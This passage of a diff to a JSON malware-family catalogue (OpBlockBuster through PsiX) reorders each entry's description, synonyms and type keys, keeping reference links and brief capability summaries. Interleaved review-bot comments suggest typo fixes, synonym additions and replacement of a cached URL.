"OpBlockBuster", - "description": "" + "value": "OpBlockBuster" }, { + "description": "OrcaRAT is a 
Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", - "value": "OrcaRAT", - "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + "value": "OrcaRAT" }, { + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. 
In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://orcustechnologies.com/", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." 
+ "value": "Orcus RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://www.gdata.de/blog/2017/11/30151-ordinypt", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "" + "value": "Ordinypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", - "value": "Overlay RAT", - "description": "" + "value": "Overlay RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", - "value": "OvidiyStealer", - "description": "" + "value": "OvidiyStealer" }, { + "description": "", "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] + ], + "synonyms": [ + "luckyowa" + ], + "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "" + "value": "owaauth" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", 
"https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "" + "value": "PadCrypt" }, { + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", - "value": "paladin", - "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + "value": "paladin" }, { + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { - "synonyms": [ - "ZeusPanda" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", 
@@ -10795,55 +10795,57 @@ "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" - ] + ], + "synonyms": [ + "ZeusPanda" + ], + "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", - "value": "PandaBanker", - "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." 
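Review bot: The OnlinerSpambot description carried to the top of its entry misspells the Ursnif family as `Ursninf`; because analysts search these descriptions by family name, the line should read `"description": "A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada."`. The PandaBanker description in the same hunk ends its first sentence with a `(*)` footnote marker that points at nothing in the entry, so the marker should either be dropped or replaced by the text it once referred to. Neither defect is introduced by the key reordering, but both lines are rewritten on the new side, so this is the place to fix them. The PandaBanker entry continues into the next hunk.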
+ "value": "PandaBanker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", - "value": "parasite_http", - "description": "" + "value": "parasite_http" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", - "value": "Penco", - "description": "" + "value": "Penco" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "" + "value": "PetrWrap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", 
@@ -10851,31 +10853,31 @@ "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "" + "value": "Petya" }, { + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { - "synonyms": [ - "ReRol" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", "https://community.fireeye.com/external/1093" - ] + ], + "synonyms": [ + "ReRol" + ], + "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", - "value": "pgift", - "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + "value": "pgift" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", 
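Review bot: `parasite_http` is the only `value` in this hunk written as a Malpedia slug rather than a display name, although the Proofpoint reference in the same entry calls the family Parasite HTTP; as far as I can tell `value` is the string that a galaxy tag carries, so a later rename would silently orphan existing tags, and the least disruptive fix is to add `"Parasite HTTP"` to the entry's `synonyms` now. PetrWrap and Petya keep `"description": ""` even though their references describe the families; a one-liner grounded in those references, e.g. `"description": "Petya-based ransomware used in targeted attacks (Kaspersky, 2017)."` for PetrWrap, would make the entries usable without a click-through. The Petya entry continues into the next hunk.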
@@ -10883,135 +10885,133 @@ "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "" + "value": "Philadephia Ransom" }, { + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { - "synonyms": [ - "Trik" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" - ] + ], + "synonyms": [ + "Trik" + ], + "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", - "value": "Phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." 
+ "value": "Phorpiex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", - "value": "pipcreat", - "description": "" + "value": "pipcreat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", - "value": "pirpi", - "description": "" + "value": "pirpi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "" + "value": "Pitou" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "" + "value": "PittyTiger RAT" }, { + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). 
In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] + ], + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + "value": "Pkybot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", - "value": "PLAINTEE", - "description": "" + "value": "PLAINTEE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", - "value": "playwork", - "description": "" + "value": "playwork" }, { + "description": "", "meta": { - "synonyms": [ - "TSCookie" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "http://www.freebuf.com/column/159865.html", 
@@ -11020,60 +11020,60 @@ "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" - ] + ], + "synonyms": [ + "TSCookie" + ], + "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD", - "description": "" + "value": "PLEAD" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "" + "value": "Plexor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", - "value": "Ploutus ATM", - "description": "" + "value": "Ploutus ATM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", - "value": "ployx", - "description": "" + "value": "ployx" }, { + "description": "RSA describes PlugX as a RAT (Remote Access 
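Review bot: The `value` `Philadephia Ransom` drops the second `l` of Philadelphia, while every reference in the entry (`win.philadelphia_ransom`, the Proofpoint and BleepingComputer posts) spells it Philadelphia; since existing tags carry the current string, the safe fix is to add `"Philadelphia Ransom"` to `synonyms` rather than rename `value`, and to note the misspelling in the description so nobody "corrects" it later. The Pkybot entry cites a `webcache.googleusercontent.com` copy of Arbor's post; a Google cache URL is transient, so it should be replaced by the original `https://www.arbornetworks.com/blog/asert/peeking-at-pkybot` embedded in that query string, or by an archive.org snapshot of it. The PLEAD entry continues into the next hunk.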
Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { - "synonyms": [ - "Korplug" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", 
@@ -11092,32 +11092,31 @@ "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://community.rsa.com/thread/185439" - ] + ], + "synonyms": [ + "Korplug" + ], + "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", - "value": "PlugX", - "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." + "value": "PlugX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", - "value": "pngdowner", - "description": "" + "value": "pngdowner" }, { + "description": "", "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", 
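Review bot: The PlugX description embeds its feature list as bare `\r\n`-separated fragments (`to retrieve:\r\nmachine information\r\ncapture the screen...`), which no other description in these hunks does and which collapses into one run-on sentence in any consumer that normalises whitespace; rewrite the list as prose or a comma-separated clause, and fix `is around since 2008` to `has been around since 2008`. The Plexor entry keeps `"description": ""` although both of its references describe the Lamberts/Longhorn toolkit it belongs to; a one-sentence description naming that toolkit and its two sources would suffice. The PlugX entry continues into the next hunk.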
@@ -11128,407 +11127,410 @@ "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "" + "value": "Poison Ivy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "" + "value": "Polyglot" }, { + "description": "", "meta": { - "synonyms": [ - "Siplog", - "Fareit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://github.com/nyx0/Pony" - ] + ], + "synonyms": [ + "Siplog", + "Fareit" + ], + "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "" + "value": "Pony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] + ], + "synonyms": [], + "type": [] }, 
"uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "" + "value": "PoohMilk Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "" + "value": "Popcorn Time" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", - "value": "portless", - "description": "" + "value": "portless" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", - "value": "poscardstealer", - "description": "" + "value": "poscardstealer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "" + "value": "Poweliks Dropper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", 
  "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd",
- "value": "PowerDuke",
- "description": ""
+ "value": "PowerDuke"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool",
  "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b",
- "value": "PowerPool",
- "description": ""
+ "value": "PowerPool"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
  "https://lokalhost.pl/gozi_tree.txt"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52",
- "value": "Powersniff",
- "description": ""
+ "value": "Powersniff"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
  "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
  "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "606f778a-8b99-4880-8da8-b923651d627b",
- "value": "PowerRatankba",
- "description": ""
+ "value": "PowerRatankba"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor",
  "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886",
- "value": "prb_backdoor",
- "description": ""
+ "value": "prb_backdoor"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka",
  "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
- "value": "Prikorma",
- "description": ""
+ "value": "Prikorma"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/",
  "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705",
- "value": "Prilex",
- "description": ""
+ "value": "Prilex"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker",
  "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/",
  "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/",
  "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
- "value": "PrincessLocker",
- "description": ""
+ "value": "PrincessLocker"
  },
  {
+ "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
  "https://twitter.com/mesa_matt/status/1035211747957923840"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9",
- "value": "PsiX",
- "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule"
+ "value": "PsiX"
  },
  {
